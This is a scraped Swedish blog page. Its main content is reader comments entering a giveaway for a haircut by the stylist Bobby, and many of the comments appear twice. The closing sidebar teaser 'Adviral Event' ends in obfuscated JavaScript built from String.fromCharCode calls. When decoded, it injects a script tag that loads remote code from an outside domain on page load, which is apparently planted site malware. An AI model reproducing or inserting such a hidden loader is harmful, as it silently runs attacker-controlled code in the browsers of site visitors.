 111. Det vore så jäkla kul o vinna en klippning av Bobby! Har velat så mkt att han ska klippa o förändra mitt hår, de vore perfekt ska på bröllop fram över😃

  O även säga hej till Goa dig skulle vara super kul😃

  Håller tummarna på att få träffa dig o bobby😃
  Kram

 112. vilken dröm att få bli klippt av Bobby!? Mitt hår är slitet och torrt och hade verkligen behövt en riktig makeover så hade varit perfekt och få vinna detta! Att dessutom ha chansen att kunna vinna Bobbys superhair med är ju fantastiskt för att få en bra hårkvalité igen! Håller verkligen alla tummar och tår!!✊??☺️

 113. Wow, vilken drömtävling!! Skulle älska att få bli klippt av ett proffs som Bobby, vilken lyx. Andra priset är ju också helt magiskt! Skulle verkligen behövas till både mitt hår och mina naglar✨ Håller tummarna riktigt hårt för att jag vinner❤️

 114. vilken dröm att få bli klippt av Bobby!😍 Mitt hår är slitet och torrt och hade verkligen behövt en riktig makeover så hade varit perfekt och få vinna detta! Att dessutom ha chansen att kunna vinna Bobbys superhair med är ju fantastiskt för att få en bra hårkvalité igen! Håller verkligen alla tummar och tår!!✊🏼😍☺️

 115. Wow, vilken drömtävling!! Skulle älska att få bli klippt av ett proffs som Bobby, vilken lyx. Andra priset är ju också helt magiskt! Skulle verkligen behövas till både mitt hår och mina naglar✨ Håller tummarna riktigt hårt för att jag vinner❤️

 116. Jag vill gärna vara med och tävla.
  Vill även gärna vinna tabletterna för att jag tappar hår som inni skogen! Blir snart flint om det ska fortsätta såhär haha.
  naglarna är kass, bryts och går sönder så även där behöver jag en push i det hela.
  Namn: Diana ”LaMadre”
  resten av infot har du va? ?
  Kram fina du. <3
  Och ja jag delar såklart ?

 117. Jag vill gärna vara med och tävla.
  Vill även gärna vinna tabletterna för att jag tappar hår som inni skogen! Blir snart flint om det ska fortsätta såhär haha.
  naglarna är kass, bryts och går sönder så även där behöver jag en push i det hela.

  Namn: Diana ”LaMadre”
  resten av infot har du va? 😉

  Kram fina du. <3
  Och ja jag delar såklart 😀

 118. ÅÅååhh vad jag börjar fantisera nu om att äntligen komma till Stockholm, bli riktigt läcker i håret, få en kram av dig och bara njuta av tillvaron:-)
  Det hade blivit en perfekt 45-års present!!
  Har delat och håller tummarna!
  Stor Varm KRAM Christina

 119. En trött småbarnsmamma till en 7 månaders sessa och en 12 årig son som jag inte träffat sedan nov 2015 då hans pappa undanhåller honom. En hårklippning och färgning skulle förgylla min höst.

 120. ÅÅååhh vad jag börjar fantisera nu om att äntligen komma till Stockholm, bli riktigt läcker i håret, få en kram av dig och bara njuta av tillvaron:-)
  Det hade blivit en perfekt 45-års present!!
  Har delat och håller tummarna!
  Stor Varm KRAM Christina

 121. En trött småbarnsmamma till en 7 månaders sessa och en 12 årig son som jag inte träffat sedan nov 2015 då hans pappa undanhåller honom. En hårklippning och färgning skulle förgylla min höst.

 122. Åh vad jag vill/behöver vinna!! Skulle sätta mig ner i stolen och ge honom fria händer!! Självklart vill jag även få krama dig ?

 123. Åh vad jag vill/behöver vinna!! Skulle sätta mig ner i stolen och ge honom fria händer!! Självklart vill jag även få krama dig 😊

 124. Det här är ju en tävling jag egentligen inte deltar i….
  Varför? Jag bor i Norrbotten…
  Och i ärlighetens namn skulle jag nog skämmas för att visa upp mitt amningsslitna, trötta, frasiga och totalt bångstyriga hår.
  MEN! Nu har jag precis börjat jobba igen efter att ha varit föräldraledig, och har två veckors utbildning i Stockholm i höst. Och allvarligt talat? Det vore LYX att kunna unna mig ett frisörbesök. Inte hos vilken frisör som helst dessutom, utan hos BOBBY. Som jag bara läst om och fascinerats över på håll. Vilken människa han verkar vara.
  Så ja, jag delar. Jag deltar. Och ja, jag skulle antagligen skämmas lite för min totala ”Kusinen-från-landet-personlighet” i Stockholm och helt bortglömda frisyr. Men jag skulle ÄLSKA varenda minut av upplevelsen!

 125. Det här är ju en tävling jag egentligen inte deltar i….
  Varför? Jag bor i Norrbotten…
  Och i ärlighetens namn skulle jag nog skämmas för att visa upp mitt amningsslitna, trötta, frasiga och totalt bångstyriga hår.

  MEN! Nu har jag precis börjat jobba igen efter att ha varit föräldraledig, och har två veckors utbildning i Stockholm i höst. Och allvarligt talat? Det vore LYX att kunna unna mig ett frisörbesök. Inte hos vilken frisör som helst dessutom, utan hos BOBBY. Som jag bara läst om och fascinerats över på håll. Vilken människa han verkar vara.

  Så ja, jag delar. Jag deltar. Och ja, jag skulle antagligen skämmas lite för min totala ”Kusinen-från-landet-personlighet” i Stockholm och helt bortglömda frisyr. Men jag skulle ÄLSKA varenda minut av upplevelsen!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/